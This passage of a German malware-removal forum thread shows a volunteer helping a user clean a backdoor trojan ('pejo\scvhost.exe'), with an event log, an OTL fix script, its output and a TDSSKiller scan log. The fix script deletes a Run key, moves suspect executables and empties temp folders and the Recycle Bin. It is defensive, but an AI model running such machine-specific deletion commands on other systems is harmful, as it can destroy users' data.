Error - 05.05.2010 04:27:04 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 11368
seconds with 1020 seconds of active time. This session ended with a crash.
Error - 15.06.2012 05:27:36 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 10
seconds with 0 seconds of active time. This session ended with a crash.
Error - 11.09.2012 10:42:12 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 1055
seconds with 960 seconds of active time. This session ended with a crash.
Error - 11.09.2012 11:20:17 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 2260
seconds with 1500 seconds of active time. This session ended with a crash.
Error - 11.03.2013 09:29:25 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 3508
seconds with 2040 seconds of active time. This session ended with a crash.
[ System Events ]
Error - 14.08.2009 16:07:32 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 15.08.2009 13:08:09 | Computer Name = ant-PC | Source = HTTP | ID = 15016
Description =
Error - 15.08.2009 13:09:04 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000
Description =
Error - 15.08.2009 13:13:45 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 15.08.2009 19:24:03 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 16.08.2009 15:56:43 | Computer Name = ant-PC | Source = HTTP | ID = 15016
Description =
Error - 16.08.2009 15:57:10 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000
Description =
Error - 16.08.2009 18:05:00 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 17.08.2009 03:11:20 | Computer Name = ant-PC | Source = HTTP | ID = 15016
Description =
Error - 17.08.2009 03:11:42 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000
Description =
< End of report >
|
|
04.06.2013, 16:30
| #2 |
| /// Malware-holic   | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Hi,
__________________otl fix Fixen mit OTL
Code:
ATTFilter :OTL
O4 - HKCU..\Run: [pejo] C:\Users\ant\AppData\Roaming\pejo\vifier.bat ()
[2013.05.19 21:22:16 | 000,000,000 | ---D | C] -- C:\Users\ant\AppData\Roaming\pejo
[2013.05.19 21:30:31 | 000,600,389 | ---- | M] () -- C:\Users\ant\5rfakc72togyi.exe
[2013.05.19 21:29:30 | 000,600,389 | ---- | M] () -- C:\Users\ant\5pyizgdrc5biy.exe
[2013.05.19 21:29:11 | 000,600,389 | ---- | M] () -- C:\Users\ant\q8x93h4akie10.exe
[2013.05.19 21:22:15 | 000,600,389 | ---- | C] () -- C:\Users\ant\9gghzlvklvp08.exe
:files
:Commands
[emptytemp]
Hinweis: Die Datei bitte wie in der Anleitung zum UpChannel angegeben auch da hochladen. Bitte NICHT die ZIP-Datei hier als Anhang in den Thread posten! Drücke bitte die  + E Taste.
__________________ |
|
04.06.2013, 16:32
| #3 |
| | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Vielen Dank für die schnelle Antwort!
__________________ |
|
04.06.2013, 16:34
| #4 |
| /// Malware-holic | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" siehe oben
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
04.06.2013, 19:57
| #5 |
| /// Malware-holic | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Danke fürs hochladen. Downloade dir bitte  TDSSKiller.exe und speichere diese Datei auf dem Desktop
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
04.06.2013, 20:02
| #6 |
| | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Erst nochmals vielen Dank! Der Upload scheint funktioniert zu haben, hier is was in der txt-datei von OTL stand: Code:
ATTFilter All processes killed
========== OTL ==========
Registry value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\pejo deleted successfully.
C:\Users\ant\AppData\Roaming\pejo\vifier.bat moved successfully.
C:\Users\ant\AppData\Roaming\pejo folder moved successfully.
C:\Users\ant\5rfakc72togyi.exe moved successfully.
C:\Users\ant\5pyizgdrc5biy.exe moved successfully.
C:\Users\ant\q8x93h4akie10.exe moved successfully.
C:\Users\ant\9gghzlvklvp08.exe moved successfully.
========== FILES ==========
========== COMMANDS ==========
[EMPTYTEMP]
User: All Users
User: ant
->Temp folder emptied: 269444850 bytes
->Temporary Internet Files folder emptied: 715667129 bytes
->Java cache emptied: 50464479 bytes
->Google Chrome cache emptied: 6059044 bytes
->Apple Safari cache emptied: 0 bytes
->Flash cache emptied: 2764 bytes
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->Flash cache emptied: 75 bytes
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes
User: Public
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 434011083 bytes
RecycleBin emptied: 7998116828 bytes
Total Files Cleaned = 9.035,00 mb
OTL by OldTimer - Version 3.2.69.0 log created on 06042013_185259
Files\Folders moved on Reboot...
PendingFileRenameOperations files...
Registry entries deleted on Reboot...
1. Als ich den Moved Files Ordner zippen wollte, bekam ich ne Fehlermeldung von Avira, konnte es erst zippen nachdem ich den "Echtzeit Scanner" deaktivierte. Denke jetzt mal das is normal? 2. Seitdem Malwarebytes Anti-Malware die scvhost.exe unter quarantäne gestellt hat, bekomme ich ein Icon in der Taskleiste/Meldung namens "Geblockte Autostartprogramme". Könnte es sein dass das damit zu tun hat dass er wohl doch noch irgendwie diese Datei ausführen will beim Start von Windows, obwohl sie gar nicht mehr vorhanden ist? 3. Könntest du irgendeine Aussage machen um was für einen Typ von Malware es sich gehandelt hat? (Virus, Wurm, etc...) Würde mich schon interessieren, falls man das so einfach klassifizieren kann... Danke! EDIT: Hab deinen Post erst nach dem Schreiben meines gesehen, werde das jetzt gleich machen... |
|
04.06.2013, 20:04
| #7 |
| /// Malware-holic | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" ein backdoor, deshalb später alle passwörter ändern, weiter mit vorhergehenem post, tds killer, am Ende sollten sich alle Probleme erledigt haben, aber noch n bissel Geduld :-)
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
04.06.2013, 20:32
| #8 |
| | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" uiuiui... na toll... naja, hoffe du bekommst das Problem gelöst, vielen Dank für die schnelle und gute Hilfe! also hier das log: Code:
ATTFilter 21:10:01.0148 4288 TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42
21:10:01.0195 4288 ============================================================
21:10:01.0195 4288 Current date / time: 2013/06/04 21:10:01.0195
21:10:01.0195 4288 SystemInfo:
21:10:01.0195 4288
21:10:01.0195 4288 OS Version: 6.0.6002 ServicePack: 2.0
21:10:01.0195 4288 Product type: Workstation
21:10:01.0195 4288 ComputerName: ANT-PC
21:10:01.0195 4288 UserName: ant
21:10:01.0195 4288 Windows directory: C:\Windows
21:10:01.0195 4288 System windows directory: C:\Windows
21:10:01.0195 4288 Processor architecture: Intel x86
21:10:01.0195 4288 Number of processors: 2
21:10:01.0195 4288 Page size: 0x1000
21:10:01.0195 4288 Boot type: Normal boot
21:10:01.0195 4288 ============================================================
21:10:02.0302 4288 Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
21:10:02.0302 4288 ============================================================
21:10:02.0302 4288 \Device\Harddisk0\DR0:
21:10:02.0302 4288 MBR partitions:
21:10:02.0302 4288 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x1388800, BlocksNum 0xDF21800
21:10:02.0302 4288 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0xF2AA000, BlocksNum 0xDF1B000
21:10:02.0302 4288 ============================================================
21:10:02.0334 4288 C: <-> \Device\Harddisk0\DR0\Partition1
21:10:02.0380 4288 D: <-> \Device\Harddisk0\DR0\Partition2
21:10:02.0380 4288 ============================================================
21:10:02.0380 4288 Initialize success
21:10:02.0380 4288 ============================================================
21:10:11.0023 4344 ============================================================
21:10:11.0023 4344 Scan started
21:10:11.0023 4344 Mode: Manual; SigCheck; TDLFS;
21:10:11.0023 4344 ============================================================
21:10:12.0442 4344 ================ Scan system memory ========================
21:10:12.0442 4344 System memory - ok
21:10:12.0442 4344 ================ Scan services =============================
21:10:12.0709 4344 [ 82B296AE1892FE3DBEE00C9CF92F8AC7 ] ACPI C:\Windows\system32\drivers\acpi.sys
21:10:12.0849 4344 ACPI - ok
21:10:12.0943 4344 [ F040037B149FD0F5A5044AE563390FA7 ] AdobeFlashPlayerUpdateSvc C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
21:10:12.0958 4344 AdobeFlashPlayerUpdateSvc - ok
21:10:13.0005 4344 [ 04F0FCAC69C7C71A3AC4EB97FAFC8303 ] adp94xx C:\Windows\system32\drivers\adp94xx.sys
21:10:13.0036 4344 adp94xx - ok
21:10:13.0052 4344 [ 60505E0041F7751BDBB80F88BF45C2CE ] adpahci C:\Windows\system32\drivers\adpahci.sys
21:10:13.0083 4344 adpahci - ok
21:10:13.0099 4344 [ 8A42779B02AEC986EAB64ECFC98F8BD7 ] adpu160m C:\Windows\system32\drivers\adpu160m.sys
21:10:13.0114 4344 adpu160m - ok
21:10:13.0145 4344 [ 241C9E37F8CE45EF51C3DE27515CA4E5 ] adpu320 C:\Windows\system32\drivers\adpu320.sys
21:10:13.0161 4344 adpu320 - ok
21:10:13.0208 4344 [ 9D1FDA9E086BA64E3C93C9DE32461BCF ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
21:10:13.0348 4344 AeLookupSvc - ok
21:10:13.0426 4344 [ 3911B972B55FEA0478476B2E777B29FA ] AFD C:\Windows\system32\drivers\afd.sys
21:10:13.0489 4344 AFD - ok
21:10:13.0551 4344 [ 13F9E33747E6B41A3FF305C37DB0D360 ] agp440 C:\Windows\system32\drivers\agp440.sys
21:10:13.0567 4344 agp440 - ok
21:10:13.0613 4344 [ AE1FDF7BF7BB6C6A70F67699D880592A ] aic78xx C:\Windows\system32\drivers\djsvs.sys
21:10:13.0629 4344 aic78xx - ok
21:10:13.0645 4344 [ A1545B731579895D8CC44FC0481C1192 ] ALG C:\Windows\System32\alg.exe
21:10:13.0816 4344 ALG - ok
21:10:13.0847 4344 [ 9EAEF5FC9B8E351AFA7E78A6FAE91F91 ] aliide C:\Windows\system32\drivers\aliide.sys
21:10:13.0879 4344 aliide - ok
21:10:13.0988 4344 AMD FUEL Service - ok
21:10:14.0050 4344 [ 9FE76D783A7D47965D086A220B54277B ] AMD Reservation Manager C:\Program Files\ATI Technologies\ATI.ACE\Reservation Manager\AMD Reservation Manager.exe
21:10:14.0081 4344 AMD Reservation Manager - ok
21:10:14.0128 4344 [ C47344BC706E5F0B9DCE369516661578 ] amdagp C:\Windows\system32\drivers\amdagp.sys
21:10:14.0175 4344 amdagp - ok
21:10:14.0191 4344 [ 9B78A39A4C173FDBC1321E0DD659B34C ] amdide C:\Windows\system32\drivers\amdide.sys
21:10:14.0222 4344 amdide - ok
21:10:14.0237 4344 [ FF258424F0B2EF25EB98F04EE386E6E3 ] amdiox86 C:\Windows\system32\DRIVERS\amdiox86.sys
21:10:14.0269 4344 amdiox86 - ok
21:10:14.0284 4344 [ 18F29B49AD23ECEE3D2A826C725C8D48 ] AmdK7 C:\Windows\system32\drivers\amdk7.sys
21:10:14.0347 4344 AmdK7 - ok
21:10:14.0362 4344 [ 93AE7F7DD54AB986A6F1A1B37BE7442D ] AmdK8 C:\Windows\system32\DRIVERS\amdk8.sys
21:10:14.0409 4344 AmdK8 - ok
21:10:14.0518 4344 [ 466A0D95960DAD3222C896D2CEA99993 ] AntiVirSchedulerService C:\Program Files\Avira\AntiVir Desktop\sched.exe
21:10:14.0534 4344 AntiVirSchedulerService - ok
21:10:14.0581 4344 [ A489BE6BB0AA1FF406B488B60542314B ] AntiVirService C:\Program Files\Avira\AntiVir Desktop\avguard.exe
21:10:14.0596 4344 AntiVirService - ok
21:10:14.0643 4344 [ C6D704C7F0434DC791AAC37CAC4B6E14 ] Appinfo C:\Windows\System32\appinfo.dll
21:10:14.0690 4344 Appinfo - ok
21:10:14.0783 4344 [ A5299D04ED225D64CF07A568A3E1BF8C ] Apple Mobile Device C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
21:10:14.0799 4344 Apple Mobile Device - ok
21:10:14.0846 4344 [ 5D2888182FB46632511ACEE92FDAD522 ] arc C:\Windows\system32\drivers\arc.sys
21:10:14.0861 4344 arc - ok
21:10:14.0893 4344 [ 5E2A321BD7C8B3624E41FDEC3E244945 ] arcsas C:\Windows\system32\drivers\arcsas.sys
21:10:14.0908 4344 arcsas - ok
21:10:14.0939 4344 [ 53B202ABEE6455406254444303E87BE1 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
21:10:14.0986 4344 AsyncMac - ok
21:10:15.0017 4344 [ 1F05B78AB91C9075565A9D8A4B880BC4 ] atapi C:\Windows\system32\drivers\atapi.sys
21:10:15.0033 4344 atapi - ok
21:10:15.0095 4344 [ B886D349AFAD502DE4F6EA0C64B1CC4D ] Ati External Event Utility C:\Windows\system32\Ati2evxx.exe
21:10:15.0205 4344 Ati External Event Utility - ok
21:10:15.0361 4344 [ 8AE1745BFC7D383DAA3F82FE8D7BE7C0 ] atikmdag C:\Windows\system32\DRIVERS\atikmdag.sys
21:10:15.0595 4344 atikmdag - ok
21:10:15.0657 4344 [ 4AA1EB65481C392955939E735D27118B ] AtiPcie C:\Windows\system32\DRIVERS\AtiPcie.sys
21:10:15.0688 4344 AtiPcie - ok
21:10:15.0766 4344 [ 68E2A1A0407A66CF50DA0300852424AB ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
21:10:15.0797 4344 AudioEndpointBuilder - ok
21:10:15.0813 4344 [ 68E2A1A0407A66CF50DA0300852424AB ] Audiosrv C:\Windows\System32\Audiosrv.dll
21:10:15.0844 4344 Audiosrv - ok
21:10:15.0953 4344 [ C143C69E089C7A13520EAF06175B3A3B ] AVerAF35 C:\Windows\system32\Drivers\AVerAF35.sys
21:10:16.0094 4344 AVerAF35 - ok
21:10:16.0156 4344 [ A33C07F7527FC4CBC664C3137EB7D744 ] AVerRemote C:\Program Files\Common Files\AVerMedia\Service\AVerRemote.exe
21:10:16.0172 4344 AVerRemote ( UnsignedFile.Multi.Generic ) - warning
21:10:16.0172 4344 AVerRemote - detected UnsignedFile.Multi.Generic (1)
21:10:16.0219 4344 [ 9AEBB2D487D9BF4C0F354899D842EDD0 ] AVerScheduleService C:\Program Files\Common Files\AVerMedia\Service\AVerScheduleService.exe
21:10:16.0234 4344 AVerScheduleService ( UnsignedFile.Multi.Generic ) - warning
21:10:16.0234 4344 AVerScheduleService - detected UnsignedFile.Multi.Generic (1)
21:10:16.0265 4344 [ D5541F0AFB767E85FC412FC609D96A74 ] avgntflt C:\Windows\system32\DRIVERS\avgntflt.sys
21:10:16.0281 4344 avgntflt - ok
21:10:16.0343 4344 [ 7D967A682D4694DF7FA57D63A2DB01FE ] avipbb C:\Windows\system32\DRIVERS\avipbb.sys
21:10:16.0375 4344 avipbb - ok
21:10:16.0406 4344 [ 271CFD1A989209B1964E24D969552BF7 ] avkmgr C:\Windows\system32\DRIVERS\avkmgr.sys
21:10:16.0421 4344 avkmgr - ok
21:10:16.0499 4344 [ 502F1C30BD50B32D00CE4DCAECC3D3C7 ] b57nd60x C:\Windows\system32\DRIVERS\b57nd60x.sys
21:10:16.0562 4344 b57nd60x - ok
21:10:16.0640 4344 [ 825F81A6F7DD073509DB101F0BA6DC59 ] BBSvc C:\Program Files\Microsoft\BingBar\BBSvc.EXE
21:10:16.0655 4344 BBSvc - ok
21:10:16.0733 4344 [ E22ABCAA7B6FF580FEB0D49545DC4263 ] BCM43XV C:\Windows\system32\DRIVERS\bcmwl6.sys
21:10:16.0889 4344 BCM43XV - ok
21:10:16.0952 4344 [ E22ABCAA7B6FF580FEB0D49545DC4263 ] BCM43XX C:\Windows\system32\DRIVERS\bcmwl6.sys
21:10:17.0014 4344 BCM43XX - ok
21:10:17.0045 4344 [ 67E506B75BD5326A3EC7B70BD014DFB6 ] Beep C:\Windows\system32\drivers\Beep.sys
21:10:17.0092 4344 Beep - ok
21:10:17.0155 4344 [ C789AF0F724FDA5852FB9A7D3A432381 ] BFE C:\Windows\System32\bfe.dll
21:10:17.0186 4344 BFE - ok
21:10:17.0264 4344 [ 93952506C6D67330367F7E7934B6A02F ] BITS C:\Windows\System32\qmgr.dll
21:10:17.0389 4344 BITS - ok
21:10:17.0435 4344 [ D4DF28447741FD3D953526E33A617397 ] blbdrive C:\Windows\system32\drivers\blbdrive.sys
21:10:17.0467 4344 blbdrive - ok
21:10:17.0576 4344 [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
21:10:17.0623 4344 Bonjour Service - ok
21:10:17.0685 4344 [ 35F376253F687BDE63976CCB3F2108CA ] bowser C:\Windows\system32\DRIVERS\bowser.sys
21:10:17.0732 4344 bowser - ok
21:10:17.0810 4344 [ 9F9ACC7F7CCDE8A15C282D3F88B43309 ] BrFiltLo C:\Windows\system32\drivers\brfiltlo.sys
21:10:17.0857 4344 BrFiltLo - ok
21:10:17.0888 4344 [ 56801AD62213A41F6497F96DEE83755A ] BrFiltUp C:\Windows\system32\drivers\brfiltup.sys
21:10:17.0950 4344 BrFiltUp - ok
21:10:17.0981 4344 [ A3629A0C4226F9E9C72FAAEEBC3AD33C ] Browser C:\Windows\System32\browser.dll
21:10:18.0028 4344 Browser - ok
21:10:18.0059 4344 [ B304E75CFF293029EDDF094246747113 ] Brserid C:\Windows\system32\drivers\brserid.sys
21:10:18.0247 4344 Brserid - ok
21:10:18.0278 4344 [ 203F0B1E73ADADBBB7B7B1FABD901F6B ] BrSerWdm C:\Windows\system32\drivers\brserwdm.sys
21:10:18.0340 4344 BrSerWdm - ok
21:10:18.0371 4344 [ BD456606156BA17E60A04E18016AE54B ] BrUsbMdm C:\Windows\system32\drivers\brusbmdm.sys
21:10:18.0449 4344 BrUsbMdm - ok
21:10:18.0465 4344 [ AF72ED54503F717A43268B3CC5FAEC2E ] BrUsbSer C:\Windows\system32\drivers\brusbser.sys
21:10:18.0527 4344 BrUsbSer - ok
21:10:18.0559 4344 [ AD07C1EC6665B8B35741AB91200C6B68 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys
21:10:18.0621 4344 BTHMODEM - ok
21:10:18.0668 4344 [ 7ADD03E75BEB9E6DD102C3081D29840A ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
21:10:18.0715 4344 cdfs - ok
21:10:18.0746 4344 [ 6B4BFFB9BECD728097024276430DB314 ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
21:10:18.0793 4344 cdrom - ok
21:10:18.0839 4344 [ 312EC3E37A0A1F2006534913E37B4423 ] CertPropSvc C:\Windows\System32\certprop.dll
21:10:18.0902 4344 CertPropSvc - ok
21:10:18.0917 4344 [ E5D4133F37219DBCFE102BC61072589D ] circlass C:\Windows\system32\drivers\circlass.sys
21:10:18.0964 4344 circlass - ok
21:10:19.0011 4344 [ D7659D3B5B92C31E84E53C1431F35132 ] CLFS C:\Windows\system32\CLFS.sys
21:10:19.0042 4344 CLFS - ok
21:10:19.0089 4344 [ 8EE772032E2FE80A924F3B8DD5082194 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
21:10:19.0105 4344 clr_optimization_v2.0.50727_32 - ok
21:10:19.0198 4344 [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
21:10:19.0307 4344 clr_optimization_v4.0.30319_32 - ok
21:10:19.0354 4344 [ 99AFC3795B58CC478FBBBCDC658FCB56 ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys
21:10:19.0401 4344 CmBatt - ok
21:10:19.0417 4344 [ 0CA25E686A4928484E9FDABD168AB629 ] cmdide C:\Windows\system32\drivers\cmdide.sys
21:10:19.0432 4344 cmdide - ok
21:10:19.0448 4344 [ 6AFEF0B60FA25DE07C0968983EE4F60A ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys
21:10:19.0463 4344 Compbatt - ok
21:10:19.0479 4344 COMSysApp - ok
21:10:19.0495 4344 [ 741E9DFF4F42D2D8477D0FC1DC0DF871 ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
21:10:19.0510 4344 crcdisk - ok
21:10:19.0541 4344 [ 1F07BECDCA750766A96CDA811BA86410 ] Crusoe C:\Windows\system32\drivers\crusoe.sys
21:10:19.0588 4344 Crusoe - ok
21:10:19.0635 4344 [ F1E8C34892336D33EDDCDFE44E474F64 ] CryptSvc C:\Windows\system32\cryptsvc.dll
21:10:19.0682 4344 CryptSvc - ok
21:10:19.0744 4344 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] DcomLaunch C:\Windows\system32\rpcss.dll
21:10:19.0807 4344 DcomLaunch - ok
21:10:19.0869 4344 [ 622C41A07CA7E6DD91770F50D532CB6C ] DfsC C:\Windows\system32\Drivers\dfsc.sys
21:10:19.0900 4344 DfsC - ok
21:10:20.0025 4344 [ 2CC3DCFB533A1035B13DCAB6160AB38B ] DFSR C:\Windows\system32\DFSR.exe
21:10:20.0228 4344 DFSR - ok
21:10:20.0275 4344 [ 7BEF2E2159EDB03105BC7A8BABE04726 ] dg_ssudbus C:\Windows\system32\DRIVERS\ssudbus.sys
21:10:20.0306 4344 dg_ssudbus - ok
21:10:20.0384 4344 [ 9028559C132146FB75EB7ACF384B086A ] Dhcp C:\Windows\System32\dhcpcsvc.dll
21:10:20.0415 4344 Dhcp - ok
21:10:20.0462 4344 [ 5D4AEFC3386920236A548271F8F1AF6A ] disk C:\Windows\system32\drivers\disk.sys
21:10:20.0477 4344 disk - ok
21:10:20.0524 4344 [ 73BAF270D24FE726B9CD7F80BB17A23D ] DKbFltr C:\Windows\system32\DRIVERS\DKbFltr.sys
21:10:20.0540 4344 DKbFltr - ok
21:10:20.0602 4344 [ 57D762F6F5974AF0DA2BE88A3349BAAA ] Dnscache C:\Windows\System32\dnsrslvr.dll
21:10:20.0649 4344 Dnscache - ok
21:10:20.0696 4344 [ 324FD74686B1EF5E7C19A8AF49E748F6 ] dot3svc C:\Windows\System32\dot3svc.dll
21:10:20.0743 4344 dot3svc - ok
21:10:20.0789 4344 [ 4F59C172C094E1A1D46463A8DC061CBD ] dot4 C:\Windows\system32\DRIVERS\Dot4.sys
21:10:20.0852 4344 dot4 - ok
21:10:20.0867 4344 [ 80BF3BA09F6F2523C8F6B7CC6DBF7BD5 ] Dot4Print C:\Windows\system32\DRIVERS\Dot4Prt.sys
21:10:20.0899 4344 Dot4Print - ok
21:10:20.0930 4344 [ A84D8A9006B1AE515CC7B6B3586C295A ] Dot4Scan C:\Windows\system32\DRIVERS\Dot4Scan.sys
21:10:20.0961 4344 Dot4Scan - ok
21:10:20.0977 4344 [ C55004CA6B419B6695970DFE849B122F ] dot4usb C:\Windows\system32\DRIVERS\dot4usb.sys
21:10:21.0023 4344 dot4usb - ok
21:10:21.0070 4344 [ A622E888F8AA2F6B49E9BC466F0E5DEF ] DPS C:\Windows\system32\dps.dll
21:10:21.0117 4344 DPS - ok
21:10:21.0148 4344 [ 97FEF831AB90BEE128C9AF390E243F80 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
21:10:21.0242 4344 drmkaud - ok
21:10:21.0304 4344 [ 5DE0FAEC9E5D1AAE74F8568897891A01 ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
21:10:21.0351 4344 DXGKrnl - ok
21:10:21.0367 4344 [ 5425F74AC0C1DBD96A1E04F17D63F94C ] E1G60 C:\Windows\system32\DRIVERS\E1G60I32.sys
21:10:21.0413 4344 E1G60 - ok
21:10:21.0445 4344 [ C0B95E40D85CD807D614E264248A45B9 ] EapHost C:\Windows\System32\eapsvc.dll
21:10:21.0491 4344 EapHost - ok
21:10:21.0554 4344 [ 7F64EA048DCFAC7ACF8B4D7B4E6FE371 ] Ecache C:\Windows\system32\drivers\ecache.sys
21:10:21.0569 4344 Ecache - ok
21:10:21.0616 4344 [ 24B46483ACC0D33783B89C7C0E4939F7 ] ECS_Loader_220 C:\Windows\system32\Drivers\ECS_Loader_220.sys
21:10:21.0663 4344 ECS_Loader_220 - ok
21:10:21.0788 4344 [ 668DCA122FFC7F10BECA6055E15FFABD ] eDataSecurity Service C:\Acer\Empowering Technology\eDataSecurity\x86\eDSService.exe
21:10:21.0803 4344 eDataSecurity Service - ok
21:10:21.0850 4344 [ 9BE3744D295A7701EB425332014F0797 ] ehRecvr C:\Windows\ehome\ehRecvr.exe
21:10:21.0881 4344 ehRecvr - ok
21:10:21.0897 4344 [ AD1870C8E5D6DD340C829E6074BF3C3F ] ehSched C:\Windows\ehome\ehsched.exe
21:10:21.0944 4344 ehSched - ok
21:10:21.0959 4344 [ C27C4EE8926E74AA72EFCAB24C5242C3 ] ehstart C:\Windows\ehome\ehstart.dll
21:10:21.0991 4344 ehstart - ok
21:10:22.0037 4344 [ E28516FED46251119ADDAF4CF33BA401 ] eLockService C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe
21:10:22.0053 4344 eLockService ( UnsignedFile.Multi.Generic ) - warning
21:10:22.0053 4344 eLockService - detected UnsignedFile.Multi.Generic (1)
21:10:22.0100 4344 [ 23B62471681A124889978F6295B3F4C6 ] elxstor C:\Windows\system32\drivers\elxstor.sys
21:10:22.0131 4344 elxstor - ok
21:10:22.0209 4344 [ 4E6B23DFC917EA39306B529B773950F4 ] EMDMgmt C:\Windows\system32\emdmgmt.dll
21:10:22.0303 4344 EMDMgmt - ok
21:10:22.0349 4344 [ 66F31FBBF96C8E10CFBB03384CCA455E ] eNet Service C:\Acer\Empowering Technology\eNet\eNet Service.exe
21:10:22.0381 4344 eNet Service ( UnsignedFile.Multi.Generic ) - warning
21:10:22.0381 4344 eNet Service - detected UnsignedFile.Multi.Generic (1)
21:10:22.0427 4344 [ 59FCCAF915BA89DD98CADF08DA91AFEE ] eRecoveryService C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe
21:10:22.0443 4344 eRecoveryService ( UnsignedFile.Multi.Generic ) - warning
21:10:22.0443 4344 eRecoveryService - detected UnsignedFile.Multi.Generic (1)
21:10:22.0490 4344 [ 3DB974F3935483555D7148663F726C61 ] ErrDev C:\Windows\system32\drivers\errdev.sys
21:10:22.0521 4344 ErrDev - ok
21:10:22.0568 4344 [ A9745687A57CDD71237915859ABA8DAC ] eSettingsService C:\Acer\Empowering Technology\eSettings\Service\capuserv.exe
21:10:22.0583 4344 eSettingsService ( UnsignedFile.Multi.Generic ) - warning
21:10:22.0583 4344 eSettingsService - detected UnsignedFile.Multi.Generic (1)
21:10:22.0646 4344 [ 67058C46504BC12D821F38CF99B7B28F ] EventSystem C:\Windows\system32\es.dll
21:10:22.0693 4344 EventSystem - ok
21:10:22.0755 4344 [ 22B408651F9123527BCEE54B4F6C5CAE ] exfat C:\Windows\system32\drivers\exfat.sys
21:10:22.0802 4344 exfat - ok
21:10:22.0864 4344 [ 1E9B9A70D332103C52995E957DC09EF8 ] fastfat C:\Windows\system32\drivers\fastfat.sys
21:10:22.0880 4344 fastfat - ok
21:10:22.0942 4344 [ AFE1E8B9782A0DD7FB46BBD88E43F89A ] fdc C:\Windows\system32\DRIVERS\fdc.sys
21:10:22.0989 4344 fdc - ok
21:10:23.0005 4344 [ 6629B5F0E98151F4AFDD87567EA32BA3 ] fdPHost C:\Windows\system32\fdPHost.dll
21:10:23.0036 4344 fdPHost - ok
